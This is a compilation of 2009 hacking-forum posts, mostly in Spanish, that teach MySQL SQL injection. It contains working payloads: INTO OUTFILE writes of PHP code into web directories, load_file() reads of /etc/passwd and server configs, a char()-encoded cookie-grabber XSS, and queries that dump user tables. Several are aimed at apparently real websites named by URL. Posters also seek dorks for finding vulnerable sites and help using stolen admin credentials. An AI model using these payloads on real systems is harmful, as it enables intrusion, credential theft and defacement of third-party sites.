Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/server/path/file.php on line xxx

To provoke an error like this try something like:
0′ AND 1=’0 or add some like param[]=1

This works at the most websites. If you’re not lucky you have to guess the web directory or try to use load_file() to fetch files on the server which might help you. Here is a new list of possible locations for the Apache configuration file, which may spoil the webdirectory path:

/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include

Check out the webservers name first by reading the header info and then figure out where it usually stores its configuration files. This also depends on the OS type (*nix/win) so you may want to check that out too. Use @@version or version() to find that out:
0′ UNION SELECT @@version,null /*
-nt-log at the end means it’s a windows box, -log only means it’s *nix box.
Or take a look at the paths in error messages or at the header.

Typical web directories to guess could be:

/var/www/root/
/var/www/dbname/path/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
..


Basically you should be allowed to write into any directory where the MySQL server has write access to, as long as you have the FILE privilege. However, an Administrator can limit the path for public write access.

[+3] create useful files

Once you figured out the right directory you can select data and write it into a file with:

0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/path/file.txt

( sometimes from mysql.user )
Or the whole data without knowing the table/column names:

1′ OR 1=1 INTO OUTFILE ‘../../web/path/file.txt

If you want to avoid splitting chars between the data, use INTO DUMPFILE instead of INTO OUTFILE.

You can also combine load_file() with into outfile, like putting a copy of a file to the accessable webspace:

0′ AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘…

In some cases I’d recommend to use

0′ AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘…

and decrypt it later with the PHP Charset Encoder, especially when reading the MySQL data files.

Or you can write whatever you want into a file:

0′ AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php

Here are some useful code examples:

A Normal code for a shell (PHP):



it's very important that the PHP safe_mode must be turned off!!. 
If is turned on maybe we can bypass symple with a hex converter:

we can convert the code for bypass MAGIC_QUOTES_GPC filter.
(normally yuo cans ee if hex_mode work with a load_file(pathinhex),
like load_file(0x2f6574632f706173737764) for /etc/password (<= usually path)


we can see a lot of informations about the webserver configuration with:



// SQL QUERY

Try to use load_file() to get the database connection credentials, or try to include an existing file on the webserver which handles the mysql connect.

REmember that the quotes are required and so if the error are like:

error db near '\/www/root/path/page.php'\
 maybe it's becouse the quotes are not allowed (with special filter used for anti-xss)

So at the end: try and try and try. iT's 3.47 of night.. @.@ , now a marocco's hackers deface r00t.h4cky0u.org uff... this fuking priv8 exploit in bad hands :)
so good night.


ByEzzz xaDoS

# milw0rm.com [2009-08-13]

XFS - XSS From SQL (2 replies)

OzX — Tue, 08 Sep 2009 14:04:55 -0400

XFS - XSS From SQL

Author : 599eme Man
Contact : flouf@live.fr

[------------------------------------------------------------------------]

[+] Summary

	[1] Presentation
	[2] Explanation
	[3] Demonstration
	[4] Bibliography


[------------------------------------------------------------------------]


[1] --[Presentation]--

	XFS is a SQL deviation who lets return javascript code by through of the function char().
This function convert an ASCII code to char, this why we'll use it to execute javascript code.
The XFS can give you a restricted XSS possibility and obviously the SQL vulnerabilty.


So for XFS we need :

 - String to ASCII converter
 - The function char()

In the next parties you will see the conditions for do it, how it work and demonstration.


[2] --[Explanation]--

	To use it, you need to convert your string in ASCII (Online Converter : http://www.easycalculation.com/ascii-hex.php).
Char() will read the ASCII code and return it, so if you insert the ASCII javascript code, char() will return you the 
javascript code and it will be executed BUT when you encode your javascript code, this code mustn't have any space, so the XSS is restricted
but you can grab, alert and a lot of other XSS thing.

Example :

If you want convert your javascript code to ASCII, for work, the javascript code mustn't to be like it :

 <= You need to delete space :

 <= Its okay, you can convert it in ASCII


When the code will be convert in ASCII, you will get a thing like it :

46 65 42 12 85 68 ...

But before put it in char(ASCII), we need to replace space by "," like it :

46,65,42,12,85,68 ... <= Its okay for put in char()


[3] --[Demonstration]--

	Vuln website :

 - http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,char(ASCII_CODE),7,8--

Some javascript codes without space :

Alert :

################################
#
#- String : 
#
#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60 47 115 99 114 105 112 116 62 
#
################################

Cookie Grabber :

################################
#
#- String : 
#
#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 110 46 104 114 101 102 61 39 104 116 116 112 58 47 47 119 119 119 46 121 111 117 114 115 105 116 101 46 99 111 109 47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107 105 101 61 39 43 101 115 99 97 112 101 40 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101 41 60 47 83 67 82 73 80 84 62 
#
################################

Cookie Grabber file :

################################
#

# 
#
################################


So before insert your ASCII in char(), you must replace (in the ASCII code) all space by ",".

Example :

################################
# 45 52 86 23 54 ...
# To :
# 45,52,86,23,54 ...
################################

So lets go :

Alert :

http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,char(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,120,115,115,39,41,60,47,115,99,114,105,112,116,62),7,8--

You can see a textbox is executed with the text : "XSS" => it's the XSS alert


[4] --[Bibliography]--

SQL tutorial :

SQL Injection Paper : http://milw0rm.com/papers/16 By Zeroday
Uncommon SQL Injection : http://milw0rm.com/papers/174 By N3T D3VIL
Full SQL Injection Tutorial (MySQL) : http://milw0rm.com/papers/202 by Marezzi
Introduction to SQL injection : http://milw0rm.com/papers/225 by Dapirates
Full SQL injection Tutorial : http://milw0rm.com/papers/349 By Moudi
Avoiding SQL Injection : http://milw0rm.com/papers/358 By Moudi


[------------------------------------------------------------------------]


[Thanks to] : Moudi, J.consultant, Sheiry, Pr0h4ck3rz, Stacker, Shimik Root aka Str0zen & Security-Shell Community

# milw0rm.com [2009-08-04]

Advanced MySQL Exploitation from BlackHat 2009 (no replies)

OzX — Fri, 31 Jul 2009 15:35:07 -0400

Download Pdf
Download Pdf Slide

Contents
1 Abstract............................................................................................................................................3
2 Introduction ....................................................................................................................................3
3 Stacked Query .................................................................................................................................3
4 Attacking MySQL on applications that do support stacked queries............................................... 4
5 Attacking MySQL on applications that do not support stacked queries........................................ 5
6 Fingerprinting the web server directory......................................................................................... 7
6.1 Fingerprint through error message method................................................................................ 7
6.2 Fingerprint through LOAD_FILE method......................................................................................7
7 Maximum size of arbitrary code allowed........................................................................................7
8 Arbitrary file compression/decompression ....................................................................................8
9 Dealing with columns......................................................................................................................8
10 Remote code execution on LAMP.................................................................................................9
11 Remote code execution on WAMP.............................................................................................10
References ........................................................................................................................................11

ME gusto la parte de las Stacked Querys. Genial ¡

Saludos¡

Optimización de SQL Union Injection en MYSQL (4 replies)

OzX — Tue, 04 Aug 2009 15:11:20 -0400

Optimización de SQL Union Injection en MYSQL

Sin lugar a dudas, este es el tipo de inyección que mas fácil se puede obtener información, en un par de consultas se lograría obtener el nombre de usuario y contraseña del administrador del sistema o de algún usuario con privilegios.
Pero también consta de una etapa que es engorrosa, la obtención de tablas y sus correspondientes campos. Claramente en una base de datos Mysql Versión 5.x.
Gracias a la base de datos information_schema, podemos obtener las tablas y los campos de la base de datos.

La sintaxis Común de la obtención de las tablas es la siguiente

Language: SQL
SELECT+table_name+FROM+information_schema.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1

Con dicha consulta obtendríamos la primera tabla de la base de datos, luego aumentando el valor de limit podríamos obtener las demás tablas.

Luego de encontrar la tabla que nosotros creemos que contendría la información de los usuarios, procedemos a obtener los campos de dicha tabla.

Por ej. , Para obtener los campos de la tabla “usuarios”.

Debemos transformar el nombre usuarios a su valor hexsql.

Usuario: 0×7573756172696F73

Language: SQL
SELECT+column_name+FROM+information_schema.COLUMNS+WHERE+table_name=0x7573756172696F73+LIMIT+0,1

Y así tendríamos los datos necesarios para poder generar la consulta final, hacia la base de datos.
Pero luego de hacerlo varias veces en distintas paginas, esta metodología resulta bastante agobiante,al tener que consultar cada tabla, cada campo por separado, es por ello que desarrolle una query que muestra la información que a nosotros nos interesa en 1 sola petición.

Ejemplo Consulta Final:

Localhost/vulnz.php?id=1+and+1=0+union+select+all+1,2,group_concat(column_name,0x3A,table_name,0x3C62723E),4,5,6+from+information_schema.columns+where+table_name=(select+table_name+from+information_schema.tables+where+table_schema=database()+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+limit+0,1)+limit+0,1--

Obtendríamos los valores de la siguiente manera.

Campo, Tabla.

Analicemos a Fondo la Consulta.

Consulta que Obtiene las Columnas en Base a una Tabla.

=1+and+1=0+union+select+all+1,2,group_concat(column_name,0x3A,table_name,0x3C62723E),4,5,6+from+information_schema.columns+where+table_name=(CONSULTA_RESTRICCION)+limit+0,1--

Consulta Restricción: Con Esta Consulta obtendremos la o las tablas que cumplan con la restricción impuesta por la expresión regular.

select+table_name+from+information_schema.tables+where+table_schema=database()+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+limit+0,1

Expresión Regular.

REGEXP+0×2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A

.*((us[ue]|log[io]n|adm)).*

Con esta Expresión podríamos obtener algunos de los nombres mas comunes de las tablas que contienen información relacionada con los usuarios como podría ser :

* Usuario
* Username
* User
* Administrador
* Administrator
* Login
* Logon
* etc

Ejemplo Real:

Fuente Vulnz

http://www.buenosaires2050.org/noticias.php?id=39+and+1=2+union+select+1,2,3,4,group_concat(column_name,0x3A,table_name,0x3C62723E),6+from+information_schema.columns+where+table_name=(select+table_name+from+information_schema.tables+where+table_schema=database()+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+limit+0,1)+limit+0,1--

Saludos a Todo el Staff de Undersecurity.net

OzX [Undersecurity.net]

Fuente

problemas con sql injection (6 replies)

birdman — Fri, 31 Jul 2009 02:08:06 -0400

hola gente antes que nada queria felicitarlos por el sitio, la verdad es que tiene mucha informacion de grandisima utilidad, y en segundo lugar queria preguntarle acerca de un problema que me tiene atascado con el aprendizaje de sql injection, la question es que tengo varias webs vulnerables a sql injection, que mediante los respectivos ataques puedo sacar el admin y el pass, el inconveniente es que a la hora de loggearme me dice que los datos ingresados son incorrectos, intente haciendo un limit para sacar otros usuarios con sus pass pero a la hora de intentar ingresar tambien me tira el mismo error, cual puede ser mi error?

como sacar informacion information_schema (7 replies)

8rux5t0r3 — Thu, 23 Jul 2009 00:18:59 -0400

Buenos dias, iniciandome en estos temas he encontrado un sitio donde es vulnerable a injecion sql y pude sacar varia informacion, hasta el nombre de la base de datos y tambien la tabla information_schema, q segun lo que lei es la que tiene toda la informacion de la base.
El tema es que no puedo encontrar la forma de obtener los nombre de las tablas.
Alguien tiene algun ejemplo o forma de poder realizar las consultas a information_schema para obtener las tablas??
muchas gracias

Dorks para buscar paginas vulnerables MYSQL (6 replies)

Guason — Tue, 14 Jul 2009 23:20:46 -0400

Hi!

Ando buscando paginas vulnerables a mysql , ya probe con allinurl:index.php?id= y noticias?id=
Pero quiero saber si alguien conoce otros dorks para mysql ???

Busqueda Binaria Aplicada a las Blind SQL Injection (11 replies)

OzX — Tue, 21 Jul 2009 13:36:26 -0400

Búsqueda Binaria Aplicada a las Blind SQL Injection
Antes de empezar me gustaría aclarar algunas cosas:

No Pretenderé Ocupar conceptos enredados, ni tampoco caer en tecnicismo, lo explicare como yo lo entiendo, y como me fuese gustado que me lo explicaran.
Esta Publicación esta enfocada a las personas que tengan nociones básicas de Blind SQL Injection, quienes no saben de qué estoy hablando, es mejor que busquen algún tutorial de este tipo de vulnerabilidad en Nuestra Comunidad. o lean los siguientes conceptos.

Conceptos :

Comandos en MYSQL :

Control De Flujos:

Información Blind SQL Injection

Blind SQL Injection by Netting

Información Búsqueda Binaria

Ahora bien empecemos…
Las Blind SQL Injection, es un tipo de vulnerabilidad que es bastante común y de una explotación bastante sencilla, pero tiene 1 solo problema. Es necesario generar una cantidad de peticiones bastante considerables hasta encontrar un valor verdadero. Por lo que se convierte en una explotación bastante lenta y tediosa.

Por Ejemplo, Planteemos el Siguiente Escenario.

Tabla User

Datos Contenidos en la tabla User:

Usuario: Administrador
Password: Undersecurity

Ahora bien, Para Empezar Nosotros Obtendremos el Primer Valor del Usuario, mediante la metodología Común para explotar las Blind SQL Injection. (En un Ambiente Controlado dentro de la consola, no es una situación real de explotación).
Para encontrar un valor verdadero tendremos que testear desde el Carácter 32 de la Tabla Ascii Hasta el Valor 122.
Como Podemos Observar en la Siguiente Imagen, el Primer valor del Usuario es “A”, transformado al formato Ascii obtendría el valor de 65.

En la Practica Tendríamos que Generar 33 Peticiones (65 – 32) para Recién Obtener el Primer valor del usuario.
Y si nos ponemos bien extremistas, si el usuario se llamara zamorano, tendríamos que generar 90 peticiones para recién Obtener el Valor. Por lo que se hace bastante lento y tedioso este tipo de explotación.

Ahora viene la implementación de Búsqueda Binaria.

La Búsqueda Binaria se basa en la teoría de divide y vencerás. La Idea es ir dividiendo el rango en mitades.
Por Ejemplo : La clave que queremos encontrar es 9.

Tenemos el Siguiente String

arreglo =(1,2,3,4,5,6,7,8,9,10,11);

Dividimos en 2 el String Obteniendo.

Restricción = ( 1, 2, 3, 4, 5,6 ) false
Restricción = (6, 7, 8, 9, 10,11) true

Si se fijan la cantidad de números dentro del arreglo, es impar, por lo que se necesita repetir un numero dentro de los 2 String resultantes (6), para obtener 2 String Con la misma cantidad de caracteres.
Y Ahora ¿Cuál seria Nuestro String a Seguir?, El que Tenga Nuestro Valor a Buscar, en este caso el segundo String o la segunda restricción.

Restricción = (6, 7,8) false
Restricción = (9, 10,11) true

Restricción = (9,10) true
Restricción = (10,11) false

Restricción = (9) true
Restricción = (10) false

Finalmente obtenemos nuestro valor, dentro de la primera restricción. Con una cantidad de 4 peticiones.
Esta Misma Metodología Ahora la Aplicaremos a una Blind SQL Injection.
Ahora Aplicaremos los Valores de la tabla Ascii desde el valor 32 hasta el 122.

Arreglo : 32-122 [Space-z]
Restriccion_1: 32-72 [Space-M]
Restricción_2: 72-122 [M-z]

Utilizáramos el Siguiente Consulta SQL.

Query Global:

+and+ (SELECT+IF ((ARREGLO), (RESTRICCION_1), false)) —

Explicación:

Si El valor a encontrar esta entre los valores del arreglo, entonces consultar si están dentro de la primera restricción. por el contrario si el valor a buscar no esta dentro de la primera restricción, entonces esto significa, que esta dentro de la segunda restricción.

Query : Restricción_1

     select+case+(ascii(mid((CONSULTA),SUBSTRING,1))+RESTRICCION_1)+when+true+then+(true)+else+false+end

Explicacion :

En el caso que el primer valor de la consulta este dentro del rango de la restriccion 1, entonces retornara verdadero. por el contrario retornara falso.

Ahora bien, un Simple Ejemplo :

Consulta :

 select+user()

Valor de user () : Administrador@localhost.com

Valor a Obtener : A

Valor ASCII :65

* Parametros:

Arreglo: 32-122 [Space-z]
Restriccion_1: 32-72 [Space-M]
Restriccion_2: 72-122 [M-z]

Consulta Completa :

http://www.host.com/vulnz.php?id=1+and+(SELECT+IF((select+case+(ascii(mid((select+user()),1,1))+BETWEEN+32+AND+122)+when+true+then+(true)+else+false+end),(select+case+(ascii(mid((select+user()),1,1))+BETWEEN+32+AND+77)+when+true+then+(true)+else+false+end),false))--

Explicacion :

Buscaremos el Primer valor de la consulta “select user()”, el cual es A, (Ascii: 65), primero consultaremos si el valor esta entre 32-122 [Space-z], si este resulta verdadero entonces retonara TRUE , o por el contrario si no esta dentro del rango 32-122 retornara FALSE.

Si el valor retornado por la primera consulta es TRUE , entonces consultara si el primer valor esta entre 32-77 [Space-M], si esto es verdadero retornara TRUE, por el contrario retonara FALSE y el valor estaria entre 72-122[M-z].

En Esta Consulta Reducimos Nuestras alternativas de 90 a 45.

¿Podrías Adivinar que Estado Retornara la Consulta , Si el valor a Buscar es 64?

* Si Pensaste en TRUE, estas en lo Correcto.

Luego En la Segunda vuelta , el rango que se encuentre dentro del valor a buscar (en este caso 32-77), se convertirá en nuestro arreglo, y se dividirá en 2 ([32-54]-[55-77]), así sucesivamente, hasta encontrar el valor final, en solo 7 consultas.

Grafica :

Full-Size
(Solo Muestra el Rango desde 32-77)

Para Demostrar Esta Metodología Desarrolle un Pequeño Programa que solamente muestra 1 carácter, en 7 peticiones.

Aclaro : Es un PoC en Php.

Posteriormente dentro del Lab de Undersecurity.net Se desarrollara la Tool Completa.

Imagen :

Código del POC Llamado BlindD00l:

Descargar Blind00l

Testeado En Mysql 5.x
Curl Activado

Gracias a toda la Comunidad Undersecurity.net

Cic4tr1z : logística Infinita
Nork : Correcciones y Apoyo en ideas extravagantes.
1995: Apoyo Incondicional.
N0b0dy :Notable y leal animo a la comunidad.
Lix : Por ser Simplemente Lix.
y A muchos mas que quedaron en el camino.

#OzX [Undersecurity.net]

Fuente

Guía Rapida de Inyecciones en MySql (1 reply)

S[e]C — Wed, 03 Jun 2009 11:43:50 -0400

Bueno mirando por ahi, me encontre un guía muy completa y exelentemente bien explicada, sobre inyecciones en mysql, explican desde:

>> Inyecciones ciegas
>> Funciones interesantes que muestran informacion util en mysql (@@version, user(), ...)
>> Saltar protección "magic_quotes_gpc"
>> Como Averiguar la rutas completas donde se encuentran los documentos web (asp, php, jsp,..) // util para inser int outfile/dumpfile por ejemplo
>> Leer ficheros del sistema por medio de inyecciones Mysql (load_file)
>> Como buscar en google de manera minuciosa
>> Consejos típicos para evitar inyecciones Sql:

y abordan preguntas como:

>> ¿Puede influir el uso de mayúsculas o minúsculas en las inyecciones?
>> ¿Cuales son las inyecciones más peligrosas?
>>¿Como averiguar los privilegios del usuario de la bd que estamos inyectando?
>> ¿Qué hacer cuando la inyección solo muestra una linea? (uso de limit)

Yo la encontre mas que interesante, ademas puede servir como referencia para el nuevo proyecto enfocado a iniciados que se esta realizando en el foro ...

Aca el : LINK

Saludos